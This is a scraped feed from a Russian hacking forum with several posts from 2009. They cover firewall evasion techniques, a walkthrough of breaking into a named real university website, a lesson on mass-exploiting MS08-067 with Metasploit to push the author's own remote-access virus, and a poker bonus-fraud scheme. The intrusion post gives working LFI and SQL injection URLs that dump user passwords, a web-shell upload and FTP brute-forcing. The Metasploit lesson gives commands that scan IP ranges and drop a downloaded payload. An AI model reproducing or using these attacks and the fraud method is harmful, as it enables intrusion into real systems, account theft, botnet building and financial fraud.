захвативший управление одним из публичных серверов, беспрепятственно проникнет и в корпоративную сеть).<br />блокировать входящие соединения в DMZ-зону из внешней сети по служебным протоколам, часто использующимся для атаки (например, ICMP; правда, полное блокирование ICMP создает большие проблемы, в частности, перестает работать ping и становится невозможным автоматическое определение наиболее предпочтительного MTU);<br />блокировать входящие/исходящие соединения с портами и/или IP-адресами внешней сети, заданными администратором.</p> <p>Фактически роль брандмауэра сводится к ограждению корпоративной сети от всяких любопытствующих, блуждающих по просторам инета. Тем не менее, прочность этого ограждения только кажущаяся. Если клиент корпоративной сети использует уязвимую версию браузера или клиента электронной почты (а большая часть программного обеспечения уязвима!), атакующему достаточно заманить его на троянизированную WEB-страничку или послать ему письмо с вирусом внутри, и через короткое время локальная сеть окажется поражена. Даже если исходящие соединения из корпоративной сети запрещены, shell-код сможет воспользоваться уже установленным TCP-соединением, через которое он был заброшен на атакованный узел, передавая хакеру управление удаленной системой.</p> <p>Брандмауэр может и сам являться объектом атаки, ведь он, как и всякая сложная программа, не обходится без дыр и уязвимостей. Дыры в брандмауэрах обнаруживаются практически каждый год и далеко не сразу затыкаются (особенно если брандмауэр реализован на &quot;железном&quot; уровне). Забавно, но плохой брандмауэр не только не увеличивает, но даже ухудшает защищенность системы (в первую очередь это относится к персональным брандмауэрам, популярность которых в последнее время необычайно высока).<br />Обнаружение и идентификация брандмауэра</p> <p>Залогом успешной атаки является своевременное обнаружение и идентификация брандмауэра (или, в общем случае, IDS, но в контексте настоящей статьи мы будем исходить из того, что она совмещена с брандмауэром).</p> <p>Большинство брандмауэров отбрасывают пакеты с истечением TTL (Time To Live – время жизни), блокируя тем самым трассировку маршрута, чем разоблачают себя. Аналогичным образом поступают и некоторые маршрутизаторы, однако, как уже говорилось выше, между маршрутизатором и пакетным фильтром нет принципиальной разницы.</p> <p>Отслеживание маршрута обычно осуществляется утилитой traceroute, поддерживающей трассировку через протоколы ICMP и UDP, причем ICMP блокируется гораздо чаще. Выбрав узел, заведомо защищенный брандмауэром (например, wwwintel.ru), попробуем отследить к нему маршрут командой traceroute –I wwww.intel.ru.</p> <p>$traceroute –I wwww.intel.ru</p> <p>Трассировка маршрута к bouncer.glb.intel.com [198.175.98.50]</p> <p>с максимальным числом прыжков 30:</p> <p>1 1352 ms 150 ms 150 ms 62.183.0.180</p> <p>2 140 ms 150 ms 140 ms 62.183.0.220</p> <p>3 140 ms 140 ms 130 ms 217.106.16.52</p> <p>4 200 ms 190 ms 191 ms aksai-bbn0-po2-2.rt-comm.ru [217.106.7.25]</p> <p>5 190 ms 211 ms 210 ms msk-bbn0-po1-3.rt-comm.ru [217.106.7.93]</p> <p>6 200 ms 190 ms 210 ms spb-bbn0-po8-1.rt-comm.ru [217.106.6.230]</p> <p>7 190 ms 180 ms 201 ms stockholm-bgw0-po0-3-0-0.rt-comm.ru [217.106.7.30]</p> <p>8 180 ms 191 ms 190 ms POS4-0.GW7.STK3.ALTER.NET [146.188.68.149]</p> <p>9 190 ms 191 ms 190 ms 146.188.5.33</p> <p>10 190 ms 190 ms 200 ms 146.188.11.230</p> <p>11 311 ms 310 ms 311 ms 146.188.5.197</p> <p>12 291 ms 310 ms 301 ms so-0-0-0.IL1.DCA6.ALTER.NET [146.188.13.33]</p> <p>13 381 ms 370 ms 371 ms 152.63.1.137</p> <p>14 371 ms 450 ms 451 ms 152.63.107.150</p> <p>15 381 ms 451 ms 450 ms 152.63.107.105</p> <p>16 370 ms 461 ms 451 ms 152.63.106.33</p> <p>17 361 ms 380 ms 371 ms 157.130.180.186</p> <p>18 370 ms 381 ms 441 ms 192.198.138.68</p> <p>19 * * * Превышен интервал ожидания для запроса.</p> <p>20 * * * Превышен интервал ожидания для запроса.</p> <p>Смотри: трассировка доходит до узла 192.198.138.68, а затем умирает, что указывает либо на брандмауэр, либо на недемократичный маршрутизатор. Чуть позже мы покажем, как можно проникнуть сквозь него, а пока выберем для трассировки другой узел, например, wwwzenon.ru</p> <p>$traceroute –I wwwzenon.ru</p> <p>Трассировка маршрута к distributed.zenon.net [195.2.91.103]</p> <p>с максимальным числом прыжков 30:</p> <p>1 2444 ms 1632 ms 1642 ms 62.183.0.180</p> <p>2 1923 ms 1632 ms 1823 ms 62.183.0.220</p> <p>3 1632 ms 1603 ms 1852 ms 217.106.16.52</p> <p>4 1693 ms 1532 ms 1302 ms aksai-bbn0-po2-2.rt-comm.ru [217.106.7.25]</p> <p>5 1642 ms 1603 ms 1642 ms 217.106.7.93</p> <p>6 1562 ms 1853 ms 1762 ms msk-bgw1-ge0-3-0-0.rt-comm.ru [217.106.7.194]</p> <p>7 1462 ms 411 ms 180 ms mow-b1-pos1-2.telia.net [213.248.99.89]</p> <p>8 170 ms 180 ms 160 ms mow-b2-geth2-0.telia.net [213.248.101.18]</p> <p>9 160 ms 160 ms 170 ms 213.248.78.178</p> <p>10 160 ms 151 ms 180 ms 62.113.112.67</p> <p>11 181 ms 160 ms 170 ms css-rus2.zenon.net [195.2.91.103]</p> <p>Трассировка завершена.</p> <p>На этот раз трассировка проходит нормально. Выходит, что никакого брандмауэра вокруг zenon'а нет? Очень может быть, но для уверенного ответа нам требуется дополнительная информация. Узел 195.2.91.193 принадлежит сети класса С (три старших бита IP-адреса равны 110), и, если эта сеть не защищена брандмауэром, большинство ее узлов должно откликаться на ping, что в данном случае и происходит. Сканирование выявляет 65 открытых адресов. Следовательно, либо маршрутизатора здесь нет, либо он беспрепятственно пропускает наш ping.</p> <p>При желании можно попробовать просканировать порты, однако, во-первых, наличие открытых портов еще ни о чем не говорит (быть может, брандмауэр блокирует лишь один порт, но самый нужный, например, защищает дырявый RPC от посягательств извне), а, во-вторых, при сканировании хакеру будет трудно остаться незамеченным. С другой стороны, порты сканируют все кому не лень, и администраторы уже давно не обращают на это внимания.</p> <p>Утилита nmap позволяет обнаруживать некоторые из брандмауэров, устанавливая статут порта во &quot;firewalled&quot;. Такое происходит всякий раз, когда в ответ на SYN удаленный узел возвращает ICMP-пакет типа 3 с кодом 13 (Admin Prohibited Filter) с действительным IP-адресом брандмауэра в заголовке (nmap его не отображает; пиши собственный сканер или, используя любой снифер, самостоятельно проанализируй возвращаемый пакет). Если возвратится SYN/ACK – сканируемый порт отрыт. RST/ACK указывает на закрытый или заблокированный брандмауэром порт. Не все брандмауэры генерируют RST/ACK при попытке подключения к заблокированным портам (Check Point Firewall – генерирует), некоторые отсылают ICMP-сообщение, как было показано выше, или ничего не посылают вообще.</p> <p>Большинство брандмауэров поддерживает удаленное управление через интернет, открывая один или несколько TCP-портов, уникальных для каждого брандмауэра. Так, например, Check Point Firewall открывает 256, 257 и 258 порты, а Microsoft Proxy – 1080. Некоторые брандмауэры явным образом сообщают свое имя и версию программного продукта при подключении к ним по netcat (или telnet), в особенности этим грешат прокси-сервера. Последовательно опрашивая все узлы, расположенные впереди исследуемого хоста, на предмет прослушивания характерных для брандмауэров портов, мы в большинстве случаев сможет не только выявить их присутствие, но и определить IP-адрес! Разумеется, эти порты могут быть закрыты как на самом брандмауэре (правда, не все брандмауэры это позволяют), так и на предшествующем ему маршрутизаторе (но тогда брандмауэром будет нельзя управлять через интернет).<br />Сканирование и трассировка через брандмауэр</p> <p>Прямая трассировка через брандмауэр чаще всего оказывается невозможной (какому администратору приятно раскрывать интимные подробности топологии своих сетей), и атакующему приходится прибегать к всевозможным ухищрениям.</p> <p>Утилита Firewalk представляет собой классический трассер, посылающий TCP- или UDP-пакеты, с таким расчетом, чтобы на узле, следующем непосредственно за брандмауэром, их TTL обращался в ноль, заставляя систему генерировать сообщение ICMP_TIME_EXCEEDED. Благодаря этому Firewalk уверенно работает даже там, где штатные средства уже не справляются, хотя крепко защищенный брандмауэр ей, конечно, не пробить и атакующему приходится использовать более продвинутые алгоритмы.</p> <p>Будем исходить из того, что с каждым отправляемым IP-пакетом система увеличивает его ID на единицу (как это чаще всего и случается). С другой стороны, согласно спецификации RFC-793, описывающей TCP-протокол, всякий хост, получивший посторонний пакет, который не относится к установленным TCP-соединениям, должен реагировать на него посылкой RST. Для реализации атаки нам понадобится удаленный узел, не обрабатывающий в данный момент никакого постороннего трафика и генерирующий предсказуемую последовательность ID. В хакерских кругах такой узел называется немым (dump). Обнаружить немой хост очень просто – достаточно лишь отправить ему серию IP-пакетов и проанализировать ID, возвращенный в заголовках. Запомним (запишем на бумажку) ID последнего пакета. Затем выберем жертву и отправим ей SYN-пакет, указав в обратном адресе IP немого узла. Атакуемый узел, думая, что немой хост хочет установить с ним TCP-соединение, ответит: SYN/ACK. Немой хост, словив посторонний SYN/ACK, возвратит RST, увеличивая свой счетчик ID на единицу. Отправив немому хосту еще один IP-пакет и проанализировав возвращенный ID, мы сможем узнать, посылал ли немой хост жертве RST-пакет или нет. Если посылал, значит, атакуемый хост активен и подтверждает установку TCP-соединения на заданный порт. При желании хакер может просканировать все интересующие его порты, не рискуя оказаться замеченным, ведь вычислить его IP практически невозможно – сканирование осуществляется &quot;руками&quot; немого узла и с точки зрения атакуемого выглядит как обычное SYN-сканирование.</p> <p>Предположим, что немой хост расположен внутри DMZ, а жертва находится внутри корпоративной сети. Тогда, отправив немому хосту SYN-пакет от имени жертвы, мы сможем проникнуть через брандмауэр, поскольку он будет думать, что с ним устанавливает соединение внутренний хост, а соединения этого типа в 99,9% случаях разрешены (если их запретить, пользователи корпоративной сети не смогут работать со своим же собственными публичными серверами). Естественно, все маршрутизаторы на пути от хакера к немому хосту не должны блокировать пакет с поддельным обратным адресом, в противном случае пакет умрет задолго до того, как доберется до места назначения.</p> <p>Утилита hping как раз и реализует сценарий сканирования данного типа, что делает ее основным орудием злоумышленника для исследования корпоративных сетей, огражденных брандмауэром.</p> <p>Как вариант, хакер может захватить один из узлов, расположенных внутри DMZ, используя их как плацдарм для дальнейших атак.<br />Проникновение через брандмауэр</p> <p>Сборку фрагментированных TCP-пакетов поддерживают только самые качественные из брандмауэров, а все остальные анализируют лишь первый фрагмент, беспрепятственно пропуская все остальные. Послав сильно фрагментированный TCP-пакет, &quot;размазывающий&quot; TCP-заголовок по нескольким IP-пакетам, хакер скроет от брандмауэра Acknowledgment Number и он не сможет определить принадлежность TCP-пакета к соответствующей ему TCP-сессии (быть может, он относится к легальному соединению, установленному корпоративным пользователем). Если только на брандмауэре не активирована опция &quot;резать фрагментированные пакеты&quot;, успех хакерской операции гарантирован. Блокирование фрагментированных пакетов создает множество проблем и препятствует нормальной работе сети. Теоретически возможно блокировать лишь пакеты с фрагментированным TCP-заголовком, однако далеко не всякий брандмауэр поддерживает столь гибкую политику настройки. Атаки данного типа, называемые Tiny Fragment Attack, обладают чрезвычайно мощной проникающей способностью и потому являются излюбленным приемом всех хакеров.</p> <p>Атаки с использованием внутренней маршрутизации (она же маршрутизация от источника, или source routing) намного менее актуальны, но мы все же их рассмотрим. Как известно, IP-протокол позволяет включать в пакет информацию о маршрутизации. При отправке IP-пакета жертве навязанная хакером маршрутизация чаще всего игнорируется, и траектория перемещения пакета определяется исключительно промежуточными маршрутизаторами, но ответные пакеты возвращаются по маршруту, обратному указанному в IP-заголовке, что создает благоприятные условия для его подмены. Более упрощенный вариант атаки ограничивается одной лишь подменой IP-адреса отправителя. Грамотно настроенные маршрутизаторы (и большинство клонов UNIX) блокируют пакеты с внутренней маршрутизацией. Пакеты с поддельными IP-адресами представляют несколько большую проблему, однако качественный брандмауэр позволяет отсеивать и их.</p> <p>Таблицы маршрутизации могут быть динамически изменены посылкой сообщения ICMP Redirect, что позволяет (по крайней мере, теоретически) направить хакерский трафик в обход брандмауэра (см. также ARP- spoofing), впрочем, сейчас такие безнадежно инсекьюрные системы практически уже не встречаются.<br />Побег из-за брандмауэра</p> <p>Пользователи внутренней сети, огражденной недемократичным брандмауэром, серьезно ограничены в своих возможностях. Про невозможность работы с FTP-серверами в активном режиме мы уже говорили. Также могут быть запрещены некоторые протоколы и закрыты необходимые тебе порты. В клинических случаях администраторы ведут черных списки IP-адресов, блокируя доступ к сайтам &quot;нецелесообразной&quot; тематики.</p> <p>Поскольку брандмауэры рассчитаны на защиту извне, а не изнутри, вырваться из-за их застенков очень просто, достаточно лишь воспользоваться любым подходящим прокси-сервером, находящимся во внешней сети и еще не занесенным администратором в черный список. В частности, популярный клиент ICQ позволяет обмениваться сообщениями не напрямую, а через сервер (не обязательно сервер компании-разработчика). Существуют тысячи серверов, поддерживающих работу ICQ. Одни существуют в более или менее неизменном виде уже несколько лет, другие динамически то появляются, то исчезают. И если &quot;долгожителей&quot; еще реально занести в стоп-лист, то уследить за серверами-однодневками администратор просто не в состоянии!</p> <p>Также можно воспользоваться протоколом SSH (Secure Shell), изначально спроектированным для работы через брандмауэр и поддерживающим шифрование трафика (на тот случай, если брандмауэр вздумает искать в нем &quot;запрещенные&quot; слова типа &quot;sex&quot;, &quot;hack&quot; и т.д.). SSH-протокол может работать по любому доступному порту, например, 80, и тогда с точки зрения брандмауэра все будет выглядеть как легальная работа с WEB-сервером. Между тем, SSH является лишь фундаментом для остальных протоколов, из которых в первую очередь хотелось бы отметить telnet, обеспечивающий взаимодействие с удаленными терминалами. Заплатив порядка 20$ за хостинг любому провайдеру, ты получишь аккаунт, поддерживающий SSH и позволяющий устанавливать соединения с другими узлами сети (бесплатные хостинги этой возможности чаще всего лишены или накладывают на нее жесткие ограничения).</p> <p>Наконец, можно воспользоваться сотовой телефонией, прямым модемным подключением и прочими коммуникационными средствами, устанавливающими соединение с провайдером, в обход брандмауэра.<br />Заключение</p> <p>Технологии построения брандмауэров не стоят на месте, и специалисты по информационной безопасности не дремлют. С каждым днем хакерствовать становится все труднее и труднее, однако полностью хакерство не исчезнет никогда. Ведь на смену заткнутым дырам приходят другие. Главное, не сидеть сложа руки, а творчески экспериментировать с брандмауэрами, изучать стандарты и спецификации, изучать дизассемблерные листинги и искать, искать, искать…</p> <p>Ссылки по теме<br />Nmap</p> <p>Популярный сканер портов, позволяющий обнаруживать некоторые типы брандмауэров. Бесплатен. Исходные тексты доступны. На сайте <a href="http://www.insecure.org/nmap" rel="nofollow" target="_blank">http://www.insecure.org/nmap</a> море технической информации по проблеме.<br />FireWalk</p> <p>Утилита для трассировки сети через брандмауэр, работающая на TCP/UDP-протоколах и основанная на TTL. Бесплатна. <a href="http://www.packetfactory.net/firewalk." rel="nofollow" target="_blank">http://www.packetfactory.net/firewalk.</a> Перед использованием рекомендуется ознакомиться с документацией <a href="http://www.packetfactory.net/firewalk/firewalk-final.pdf." rel="nofollow" target="_blank">http://www.packetfactory.net/firewalk/f &#8230; final.pdf.</a><br />HPING</p> <p>Утилита, реализующая сканирование через немой хост. Мощное оружие для исследования внутренней сети по-за брандмауэром. Бесплатна и хорошо документирована. <a href="http://www.hping.org/papers.html." rel="nofollow" target="_blank">http://www.hping.org/papers.html.</a><br />SSH-клиент</p> <p>Secure Shell клиент, используемый пользователями внутренней сети для преодоления запретов и ограничений, наложенных брандмауэром. Бесплатен. Распространяется вместе с исходными текстами. <a href="http://www.openssh.com" rel="nofollow" target="_blank">http://www.openssh.com</a>.<br />FFAQ</p> <p>Подробный FAQ по брандмауэрам на английском языке. wwwinterhack.net/pubs/fwfaq/firewalls-faq.pdf. Его русский перевод, не отличающейся особой свежестью, лежит на ln.com.ua/~openxs/articles/fwfaq.html.<br />Firewalls</p> <p>Конспект лекций по брандмауэрам (на английском языке) от тайваньского профессора Yeali S. Sun. <a href="http://www.im.ntu.edu.tw/~sunny/pdf/IS/Firewall.pdf" rel="nofollow" target="_blank">http://www.im.ntu.edu.tw/~sunny/pdf/IS/Firewall.pdf</a><br />OpenNet</p> <p>Огромный портал по сетевой безопасности, содержащий в том числе и информацию о дырах в популярных брандмауэрах (на русском и английском языках). <a href="http://www.opennet.ru" rel="nofollow" target="_blank">http://www.opennet.ru</a></p> <p>Брандмауэры подвержены большому количеству DoS-атак, таких, как эхо-шторм или SYN-flood, которым они в принципе неспособны противостоять.</p> <p>Брандмауэр – это маршрутизатор, проски-север и система обнаружения вторжений в одном флаконе.</p> <p>Брандмауэры не защищают от атак, а лишь ограждают локальную сеть кирпичным забором, через который легко перелезть.</p> <p>В большинстве случаев сквозь кирпичную стену брандмауэра можно пробить ICMP-тоннель, обернув передаваемые данные ICMP-заголовком.</p> <p>Брандмауэр можно атаковать не только извне, но и изнутри корпоративной сети.</p> <p>Различные брандмауэры по-разному реагируют на нестандартные TCP-пакеты, позволяя идентифицировать себя.</p> <p>Брандмауэры, открывающие 53 порт (служба DNS) не только на приемнике (например, Check Point Firewall), но и на источнике, позволяют хакеру просканировать всю внутреннюю сеть.</p> <p>Уязвимость программных прокси в общем случае невелика, и в основном они атакуются через ошибки переполнения буфера.</p> <p>Некоторые брандмауэры подвержены несанкционированному просмотру файлов через порт 8010 и запросы типа <a href="http://www.host.com" rel="nofollow" target="_blank">http://www.host.com</a>::8010/c:/ или <a href="http://www.host.com" rel="nofollow" target="_blank">http://www.host.com</a>::8010//.<br />Служба DCOM нуждается в широком диапазоне открытых портов, что существенно снижает степень защищенности системы, обессмысливая использование брандмауэра.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:39:49 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=49#p49 http://sapog.forumbb.ru/viewtopic.php?pid=48#p48 <p>PHP – Include, и немного удачи.</p> <p>Сегодня мы рассмотрим к каким последствиям может привести локальный PHP – Include, скажу сразу в более удачных ситуациях, последствия могут быть еще более плачебны.</p> <p>Собираем Баги.</p> <p>Все началось с найденной на сайте БГУ уязвимости, в другой день и при других обстоятельствах, я, скорее всего не обратил бы на нее внимания, но этому сайту повезло (или не повезло, смотря, как посмотреть).</p> <p><a href="http://www.brgu.ru/index.php?openpage=/etc/passwd" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=/etc/passwd</a></p> <p>Итак, мы имеем локальный PHP – Include.</p> <p>//..................................</p> <p>if (@$_GET['openpage'])<br />$file=$_GET['openpage'];</p> <p>if(file_exists($file))<br />include($file);</p> <p>else<br />print ('file not found');</p> <p>//..............................</p> <p>Он был порожден примерно таким кодом, функция file_exists, проверяет, существует ли такой файл на сервере, а затем, если существует инклудит его, таким образом, мы можем читать файлы на сервере, но нужно иметь полный путь к файлу и соответствующие права (например, файл /etc/shadow, мы не прочтем — прав не хватит).</p> <p>Проверим параметры на уязвимость к sql инъекции.</p> <p><a href="http://www.brgu.ru/index.php?openpage=readnews.php&amp;id=227+union+select+1,2,user" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=r &#8230; t+1,2,user</a>(),database(),version(),6,7+limit+1,1--</p> <p>Версия БД - 4.1.20 значит служебной таблицы information_schema, в которой хранятся название всех таблиц и колонок не существует, прийдется гадать, но это оказалось не сложно:</p> <p><a href="http://www.brgu.ru/index.php?openpage=readnews.php&amp;id=227+union+select+1,2,password,database" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=r &#8230; d,database</a>(),name,6,7+from+users+limit+1,1--</p> <p>Получили доступ к таблице, в которой хранятся аккаунты пользователей форума, нашли админский. Теперь нам не придется регистрироваться, заходим под любым аккаунтом, ищем баги дальше. Форум выглядит не очень безопасным.cмотрим на копирайты, понятно форум самописный, ну что, могу спорить он весь в дырах.</p> <p>Снова php – include:</p> <p><a href="http://www.forum.brgu.ru/index.php?page=/etc/passwd" rel="nofollow" target="_blank">http://www.forum.brgu.ru/index.php?page=/etc/passwd</a></p> <p>Пробуем оставить сообщение на форуме:</p> <p>[sсriрt]аlеrt('хss')[/sсriрt]</p> <p>Выдим выскочило окно с надписью xss, да и межсайтовый скриптинг при нас.</p> <p>Получаем Вебшелл.</p> <p>Уязвимостей тут хоть отбавляй, казалось бы при таком смертельно опасном наборе дыр, взломать сайт не составит проблем, но на самом деле мы не так уж и много имеем sql – иньекция исчерпала свой потенциал, когда отдала нам аккаунты пользователей форма, тем самым сделав бесполезным использование xss, остался только php-include, тоесть мы можем проинклудить вредоносный php скрипт, да но нужно для начала залить этот скрипт на сервер, посмотрев форум мы убедились, что залить свою аватару или вообще заливать свои файлы — возможности нет.</p> <p>Уже от безнадежности сканируя порты я заметил, что тут стоит фтп сервер и есть анонимный доступ, причем папка:</p> <p><a href="ftp://www.brgu.ru/pub_rw/%C4%EE%EA%F3%EC%E5%ED%F2%E0%F6%E8/" rel="nofollow" target="_blank">ftp://www.brgu.ru/pub_rw//</a></p> <p>Доступна для записи!</p> <p>А что если проинклудить файл с фтп? нужно попробывать!</p> <p>Допустим, существует фтп сервер, но он не предоставляет всю файловую систему в наше распоряжение (если только админ не постарался этого настроить) а только отдельную директорию (такая директория называется домашней директорией фтп сервера), то есть к файлам на фтп теоретически можно обратиться и из http, только нужно знать «домашний» каталог фтп сервера, путь к нему. Примерно так я представлял себе структуру файлов на сервере (на самом деле она оказалась другой, но это не важно, главное принцип)</p> <p><a href="http://www.brgu.ru/index.php?openpage=../" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../</a></p> <p>Означает подняться на один каталог вверх, то есть мне не нужно искать полный путь к домашней папке фтп сервера, а достаточно, знать только название папки (если, конечно, сайт и домашняя директория фтп, находятся в одном дереве каталогов), и просто попытаться угадать</p> <p><a href="http://www.brgu.ru/index.php?openpage=../ftphome" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../ftphome</a><br /><a href="http://www.brgu.ru/index.php?openpage=../../ftphome" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../../ftphome</a><br /><a href="http://www.brgu.ru/index.php?openpage=../../../ftphome" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../../../ftphome</a></p> <p>И так пока не пропадет ошибка, если она пропадет, то значит, такой каталог существует, кстати, всегда, можно автоматизировать процесс...</p> <p>Мне не пришлось этого делать, ибо мне улыбнулась удача!</p> <p><a href="http://www.brgu.ru/index.php?openpage=../../ftp/" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../../ftp/</a></p> <p>После я зашел на фтп сервер и залил на него скрипт вебшелла, а затем проинклудил его</p> <p><a href="http://www.brgu.ru/index.php?openpage=../../ftp/pub_rw/%C4%EE%EA%F3%EC%E5%ED%F2%E0%F6%E8/shell.php" rel="nofollow" target="_blank">http://www.brgu.ru/index.php?openpage=../../ftp/pub_rw//shell.php</a></p> <p>Теперь вернемся к /etc/passwd, здесь мы можем видеть аккаунты всех пользователей сервера, у r57, есть замечательная возможность, мы можем попробывать сбрутить более привилегированные аккаунты к фтп серверу опираясь на /etc/passwd, получаем:</p> <p>ftp:ftp<br />aspirantura1:aspirantura1<br />profcom11:profcom11</p> <p>Теперь закачаем наш шелл в другой каталог, и удалим с фтп сервера файлы, что мы заливали ранее (чтоб не палится).</p> <p>Защита.</p> <p>Я расскажу только о защите от php – include, поскольку, все остальные уязвимости, найденные в скриптах, не сыграли почти ни какой роли.</p> <p>Самый надежный способ защититься, это создать массив, в котором будут храниться все возможные значения переменной, и проверять — если в массиве не встречается такого значения переменной, то, например, редикет на главную страницу сайта.</p> <p>//..................................</p> <p>$module = $_GET['module'];<br />$arr = array('main', 'about', 'links', 'forum');<br />if (!in_array($module,$arr)) $module = $arr[0];<br />include $module . '.php';</p> <p>//..............................</p> <p>Вывод.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:38:55 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=48#p48 http://sapog.forumbb.ru/viewtopic.php?pid=47#p47 <p>Если честно я относительно новичок в хакинге, но решил попробовать написать статью а возможно и серию если вам понравиться</p> <p>Причина в том,что судя по другим статьям, чисто обучения нет, есть практические приёмы и секреты, по которым можно выпендреться перед друзьями взломав древний сайт с уязвимостями скриптов(есть исключения)</p> <p>Но взломав этот сайт по инструкции ты не будешь понимать принципа работы уязвимости, так вот я попытаюсь составить план обучения для новичков, от a до я,кидая ссылки,давая задания, а чтобы вам не становилось скучно иногда буду про хакерские секреты и писать</p> <p>Сразу скажу что хакерство это целая наука,и местами нужно учить как в школе или универе)</p> <p>И так начну)</p> <p>урок 1 практика<br />использование ms08_067 для массрутинга и массовой заливки своего вируса(многое взял из журнала хакер, но довёл до работы).По идее у вас будет несколько дедиков, в зависимости от диапазона ip</p> <p>и так, вам понадобиться:<br />-metasploit framework с оф сайта<br />-этот архив с исправлениями для metasploita, вирусом написанным мною и основанном на радмине, картинки процесса<br /><a href="http://narod.ru/disk/14499386000/The%20beggining.rar.html" rel="nofollow" target="_blank">http://narod.ru/disk/14499386000/The beggining.rar.html</a><br /><a href="http://letitbit.net/download/5661.5916aae45b0f86b20736b3a73/The_beggining.rar.html" rel="nofollow" target="_blank">http://letitbit.net/download/5661.5916a &#8230; g.rar.html</a><br />-место куда залить вирус, чтобы была прямая ссылка<br />-клиент радмина с оф сайта<br />вроде всё)</p> <p>Приготовления:<br />1)<br />скачиваем <br />-metasploit framework 3.2 именно 3.2<br />-radmin client выше 3)<br />-мой архив<br />Устанавливаем метсаплоит(полную установку с nmap) и патчим его патчами из архива. инструкция внутри)Хд</p> <p>2)<br />ищем хостинг куда можно закинуть hz.exe(radmin)<br />я у себя сервер поставил<br />надо так,чтобы при нажатии на ссылку сразу закачка начиналась,так что letitbit не то)</p> <p>Действия:<br />1)узнаём свой внешний ip: ziz.h18.ru/ip.php мой сайт, так что юзайте на здоровье<br />2)запускаем метасплоит<br />на верху windows&gt;console<br />пишем <br />load db_sqlite3 загружает библиотеку<br />db_create создаёт базу данных<br />db_nmap -sT -PN -PS445 -p445 87.117.180-190.* сканирует хосты на наличие открытых 445 tcp портов(не советую слишком большой диапазон брать, времени много займёт, как у меня основываясь на своём сделайте). ждём минут 5, покажется что зависло всё,но это не так)<br />setg URL <a href="http://172.16.1.10/hz.exe" rel="nofollow" target="_blank">http://172.16.1.10/hz.exe</a> это задаст параметр который отвечает за то,откуда нагрузка скачает вирус<br />db_autopwn -e -p -P windows/download_exec/bind_tcp -m ms08_067 это всё запустит, через какое то время в module output появяться шеллы, на них ip написан, на них и коннектимся радмином))))либо просто кликните на них и ручками всё сделайте)чисто фантазия уже)))</p> <p>эту уязвимость использовал conficer(крупнейший botnet)</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:37:11 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=47#p47 http://sapog.forumbb.ru/viewtopic.php?pid=46#p46 <p>Статья написана для людей любого рода деятельности, но которые хотят заработать в интернете, невзирая на мошенничество :)<br />(статьи писать не умею, так что если изложил не доходчиво, то нагами не пинайте, старался как мог, статья первая :) )</p> <p>Здрасте.<br />Я знаю способ как можно зарабатывать примерно 50$ и более в день <br />(в зависимости от вашего труда) :)<br />Скажу сразу что этот способ, является мошенничеством, но несмотря на это будем наказывать буржуев :) <br />Даже если вас запалят, что вы играете не честно, то вам ничего не будет! Максимум заблокируют акк.</p> <p>Начнём.<br />Мой друг часто играет в онлайн-покер и знает кто и сколько даёт бездепозитных бонусов.<br />Он наткнулся на замечательный онлайн-покер рум WolfWhitePoker, он предоставляет новым игрокам бонус в </p> <p>размере 5$ сразу! Я уже не помню как и прикаких обстоятельствах мы начали изучать данный покер-рум, мы </p> <p>ковырялись несколько дней и наш труд себя оправдал.</p> <p>Подробнее о покер-руме.<br />При регистрации (по специальной ссылке) вам сразу начисляют 5 уе. Но естественно нам было интересно по чём </p> <p>именно идёт привязка, т.к. если создать 1 акк, то на второй уже бонус не приходит!<br />При детальном изучении мы выяснили, что привязка идёт по ip (ну это естественно) и id винды. Т.к. ip у нас динамический, то 1 момент мы уже сразу откинули (если у вас ip статический, то юзайте прокси). <br />При создании каждого нового акка вы должны менять ip и id винды!!!</p> <p>Шаг 1.<br />Регимся, по спец ссылке (сейчас она <br /><a href="https://www.whitewolfpoker.com/ru.get-started.sign-up?bonus=pokerfree5" rel="nofollow" target="_blank">https://www.whitewolfpoker.com/ru.get-s &#8230; pokerfree5</a>)</p> <p>Шаг 2.<br />сливаем деньги своему другу :) Хоче предупредить что не так всё просто, т.к. при слитии лучше играть не 1 </p> <p>на 1 (ты и друг), а играть и с другими игроками, т.к. при выплате денег, они просматривают статистику </p> <p>игрока, с кем он играл и т.д.</p> <p>Шаг 3.<br />Когда деньги слили другу, то друг пусть играет (работает на статы), а вы тем временем меняйте ip и id винды. IP меняется прокси (если не динамический), а id винды меняется пуск &gt; выполнить &gt; пишем regedit &gt; находим HKEY_LOcAL_MACHINE &gt; SOFTWARE &gt; MICROSOFT &gt; CURENT VERSION &gt; Product ID (вот тут и меняйте)</p> <p>Заметки.<br />1. Ваш друг должен создать только 1 акк (на который и будут сливаться деньги) и под своими реальными данными, т.к. при выводе денег они проверяют.<br />2. Ваш друг должен играть не только с вами, но и другими игроками, т.к. при выводе денег просматривается статистика игрока.<br />3. Играйте на безлимитке, т.к. быстрее сливаются деньги, НО НЕ СТАВЬТЕ СРАЗУ ВСЕ ДЕНЬГИ!!! т.к. могут заподозрить в нечестной игре (курочка по зёрнышку клюёт), продумайте способ кто сколько кому будет сливать.<br />4. Говорите друг другу свои карты. (Желательно общаться по скайпу, чтобы долго не писать)<br />5. Данный покер-рум ещё молодой и активно следит за играми игроков.<br />6. При выводе денег у вас могут попросить скан вашего паспорта.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:36:09 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=46#p46 http://sapog.forumbb.ru/viewtopic.php?pid=45#p45 <p>Как стать участником чужого TCP соединения (hacking)<br />Введение.<br />Доброго времени суток. На этот раз предлагаю Вам обсудить довольно сложную тему, а именно как войти в систему не зная пароля и даже имени пользователя. Итак приступим.</p> <p>Многие слышали выражения типа &quot;Зателнеться по такому-то порту&quot; или &quot;Залей сниффер по ФТП-шнику&quot; и т.п. И многие из Вас телнетились или заходили по ФТП на сервер. Ну и что там видно после соединения? Да 